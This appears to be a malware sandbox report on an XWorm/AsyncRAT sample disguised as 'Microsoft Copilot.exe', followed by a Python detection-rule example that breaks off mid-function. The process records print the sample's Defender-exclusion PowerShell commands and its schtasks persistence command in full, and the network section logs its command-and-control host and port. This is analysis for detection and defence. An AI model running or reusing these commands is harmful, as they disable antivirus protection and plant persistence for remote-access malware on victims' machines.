                                                                                    add esp, 08h
                                                                                    mov eax, dword ptr [00A52D34h]
                                                                                    mov ecx, dword ptr [00A52D38h]
                                                                                    mov edx, dword ptr [00A52D3Ch]
                                                                                    mov dword ptr [ebp-08h], eax
                                                                                    lea eax, dword ptr [ebp-04h]
                                                                                    push eax
                                                                                    mov eax, dword ptr [00A53000h]
                                                                                    push eax
                                                                                    push edx
                                                                                    push ecx
                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                    push eax
                                                                                    call 00007F1940D138BEh
                                                                                    add esp, 14h
                                                                                    mov eax, dword ptr [00A52D34h]
                                                                                    mov ecx, dword ptr [00A52D38h]
                                                                                    mov edx, dword ptr [00A52D3Ch]
                                                                                    mov dword ptr [ebp-08h], eax
                                                                                    mov eax, dword ptr [edx]
                                                                                    push eax
                                                                                    mov eax, dword ptr [ecx]
                                                                                    push eax
                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                    mov eax, dword ptr [eax]
                                                                                    push eax
                                                                                    call 00007F1940D1369Ch
                                                                                    add esp, 0Ch
                                                                                    push eax
                                                                                    call 00007F1940D13894h
                                                                                    add esp, 04h
                                                                                    leave
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 00000004h
                                                                                    nop
                                                                                    mov eax, dword ptr [00A52D34h]
                                                                                    mov ecx, dword ptr [ebp+08h]
                                                                                    mov dword ptr [eax], ecx
                                                                                    mov eax, dword ptr [00000000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x652cc0 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x654000 | 0xa950 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x652d10 | 0x58 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x608 | 0x800 | 8b04f8cbdeb565deb627a3ffa8eabacf | False | 0.38525390625 | data | 4.428287327715436 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x650ec3 | 0x651000 | 7cbd850aebc58b480e1ab008bc8236be | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x653000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x654000 | 0xa950 | 0xaa00 | e0316afc28b254b69257ee161ecddd58 | False | 0.9827205882352941 | data | 7.965592124903254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x654100 | 0xa590 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9960362400906002
RT_GROUP_ICON | 0x65e690 | 0x14 | data | English | United States | 1.1
RT_MANIFEST | 0x65e6a8 | 0x2a5 | XML 1.0 document, ASCII text | English | United States | 0.4756277695716396
DLL | Import
msvcrt.dll | malloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
shell32.dll | ShellExecuteA
kernel32.dll | SetUnhandledExceptionFilter
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T00:54:49.015016+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49973 | 147.185.221.21 | 47900 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 00:53:12.094173908 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 7, 2024 00:53:12.098937035 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Oct 7, 2024 00:53:12.098999023 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 7, 2024 00:53:12.099562883 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 7, 2024 00:53:12.104307890 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Oct 7, 2024 00:53:12.575023890 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Oct 7, 2024 00:53:12.623529911 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 7, 2024 00:54:12.216790915 CEST | 49971 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:12.223556042 CEST | 47900 | 49971 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:12.223707914 CEST | 49971 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:12.269644022 CEST | 49971 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:12.276139021 CEST | 47900 | 49971 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:26.720530987 CEST | 49971 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:26.727863073 CEST | 47900 | 49971 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:33.614598989 CEST | 47900 | 49971 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:33.614741087 CEST | 49971 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:34.155519009 CEST | 49971 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:34.162681103 CEST | 47900 | 49971 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:34.169868946 CEST | 49973 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:34.177062988 CEST | 47900 | 49973 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:34.177184105 CEST | 49973 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:34.229667902 CEST | 49973 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:34.236675978 CEST | 47900 | 49973 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:49.015016079 CEST | 49973 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:49.019804001 CEST | 47900 | 49973 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:52.610183954 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 7, 2024 00:54:52.618457079 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Oct 7, 2024 00:54:52.618583918 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Oct 7, 2024 00:54:55.549041033 CEST | 47900 | 49973 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:55.549154043 CEST | 49973 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:55.609005928 CEST | 49973 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:55.615051031 CEST | 47900 | 49973 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:55.615818024 CEST | 49974 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:55.622077942 CEST | 47900 | 49974 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:54:55.622200966 CEST | 49974 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:55.662918091 CEST | 49974 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:54:55.669372082 CEST | 47900 | 49974 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:55:06.124178886 CEST | 49974 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:55:06.130610943 CEST | 47900 | 49974 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:55:15.281105042 CEST | 49974 | 47900 | 192.168.2.7 | 147.185.221.21
Oct 7, 2024 00:55:15.285897017 CEST | 47900 | 49974 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:55:17.002549887 CEST | 47900 | 49974 | 147.185.221.21 | 192.168.2.7
Oct 7, 2024 00:55:17.002717018 CEST | 49974 | 47900 | 192.168.2.7 | 147.185.221.21
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 00:53:12.080708027 CEST | 61389 | 53 | 192.168.2.7 | 1.1.1.1
Oct 7, 2024 00:53:12.087766886 CEST | 53 | 61389 | 1.1.1.1 | 192.168.2.7
Oct 7, 2024 00:54:12.192682981 CEST | 58771 | 53 | 192.168.2.7 | 1.1.1.1
Oct 7, 2024 00:54:12.211497068 CEST | 53 | 58771 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 00:53:12.080708027 CEST | 192.168.2.7 | 1.1.1.1 | 0xb833 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Oct 7, 2024 00:54:12.192682981 CEST | 192.168.2.7 | 1.1.1.1 | 0x2b77 | Standard query (0) | content-portion.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 00:53:12.087766886 CEST | 1.1.1.1 | 192.168.2.7 | 0xb833 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 00:54:12.211497068 CEST | 1.1.1.1 | 192.168.2.7 | 0x2b77 | No error (0) | content-portion.gl.at.ply.gg | | 147.185.221.21 | A (IP address) | IN (0x0001) | false
                                                                                    • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 208.95.112.1 | 80 | 6488 | C:\Users\user\AppData\Local\Temp\Copilot.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 00:53:12.099562883 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Oct 7, 2024 00:53:12.575023890 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Sun, 06 Oct 2024 22:53:11 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false

                                                                                    Target ID:0
                                                                                    Start time:18:53:06
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\Desktop\PixpFUv4G7.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\PixpFUv4G7.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:6'669'824 bytes
                                                                                    MD5 hash:75C7DA1457F052AE8AA48571898D4094
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:18:53:07
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Copilot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Copilot.exe"
                                                                                    Imagebase:0x960000
                                                                                    File size:71'680 bytes
                                                                                    MD5 hash:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: ditekSHen
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 84%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:3
                                                                                    Start time:18:53:07
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\SysWOW64\unarchiver.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
                                                                                    Imagebase:0x3d0000
                                                                                    File size:12'800 bytes
                                                                                    MD5 hash:16FF3CC6CC330A08EED70CBC1D35F5D2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:18:53:07
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\SysWOW64\7za.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
                                                                                    Imagebase:0xa0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:18:53:07
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:18:53:11
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:18:53:11
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:18:53:18
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Copilot.exe'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:18:53:18
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:20:34:28
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:20
                                                                                    Start time:20:34:29
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:21
                                                                                    Start time:20:34:46
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Copilot.exe'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:22
                                                                                    Start time:20:34:46
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:26
                                                                                    Start time:20:35:09
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                                                                                    Imagebase:0x7ff6e7500000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:27
                                                                                    Start time:20:35:09
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:28
                                                                                    Start time:20:35:11
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                                                                                    Imagebase:0xf20000
                                                                                    File size:71'680 bytes
                                                                                    MD5 hash:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: ditekSHen
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 84%, ReversingLabs
                                                                                    Has exited:true

                                                                                    Target ID:29
                                                                                    Start time:20:35:23
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                                                                                    Imagebase:0x9c0000
                                                                                    File size:71'680 bytes
                                                                                    MD5 hash:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:30
                                                                                    Start time:20:35:31
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                                                                                    Imagebase:0x560000
                                                                                    File size:71'680 bytes
                                                                                    MD5 hash:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:31
                                                                                    Start time:20:36:01
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                                                                                    Imagebase:0x660000
                                                                                    File size:71'680 bytes
                                                                                    MD5 hash:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

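The process records above show the sample's Defender-evasion and persistence chain: four powershell.exe launches with -ExecutionPolicy Bypass that use Add-MpPreference to add path and process exclusions for the dropped Temp executable, then a schtasks.exe /create run with /RL HIGHEST firing every minute against that same Temp path, followed by the dropped file executing. As an added example (not part of the Joe Sandbox report and not the sample's own code), the following Python applies command-line detection rules over those lines and then correlates them: a path that is both excluded from Defender and the action of a newly created scheduled task is a much stronger signal than either event alone. The rule names, the ATT&CK technique mappings and the sample log (copied from the command lines in the records above, with conhost and the archive-extraction lines kept as benign noise) are this example's own assumptions.

```python
import re
from dataclasses import dataclass

# Command lines copied from the process records above. The list is constructed
# for this example; conhost and the two archive-extraction lines are kept as
# benign noise so the rules have something to ignore.
SAMPLE_LOG = r"""
"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Copilot.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Copilot.exe'
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
"C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
"""


@dataclass(frozen=True)
class Finding:
    rule: str         # short rule name (this example's own naming)
    technique: str    # MITRE ATT&CK technique ID the rule maps to ("" if none)
    value: str        # the path or name the rule extracted
    commandline: str


USER_TEMP = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)
# -ExclusionPath / -ExclusionProcess / -ExclusionExtension followed by a
# single-quoted, double-quoted or bare value.
MP_EXCLUSION = re.compile(
    r"-exclusion(path|process|extension)\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.IGNORECASE)
# schtasks action: /tr "<path>" or /tr <path>
TASK_ACTION = re.compile(r"/tr\s+(?:\"([^\"]*)\"|(\S+))", re.IGNORECASE)


def image_path(cmdline: str) -> str:
    """Path of the executable that starts the command line (quoted or bare)."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return m.group(1) or m.group(2)


def image_name(cmdline: str) -> str:
    """Lower-cased basename of the executable that starts the command line."""
    return image_path(cmdline).rsplit("\\", 1)[-1].lower()


def analyze(cmdline: str) -> list[Finding]:
    """Apply every command-line rule to one process and return its findings."""
    found: list[Finding] = []
    image = image_name(cmdline)
    low = cmdline.lower()

    if image == "powershell.exe":
        if re.search(r"-(?:executionpolicy|ep)\s+bypass", low):
            found.append(Finding("powershell_execution_policy_bypass", "T1059.001", "Bypass", cmdline))
        if "add-mppreference" in low:
            for m in MP_EXCLUSION.finditer(cmdline):
                value = m.group(2) or m.group(3) or m.group(4)
                # Impair Defenses: Disable or Modify Tools
                found.append(Finding("defender_exclusion_" + m.group(1).lower(), "T1562.001", value, cmdline))

    if image == "schtasks.exe" and "/create" in low:
        m = TASK_ACTION.search(cmdline)
        target = (m.group(1) or m.group(2)) if m else ""
        if USER_TEMP.search(target):
            # Scheduled Task/Job: Scheduled Task; HIGHEST run level is the extra tell
            rule = "schtasks_temp_target_highest" if "/rl highest" in low else "schtasks_temp_target"
            found.append(Finding(rule, "T1053.005", target, cmdline))

    # Weak signal on its own: an image started from the user's Temp directory.
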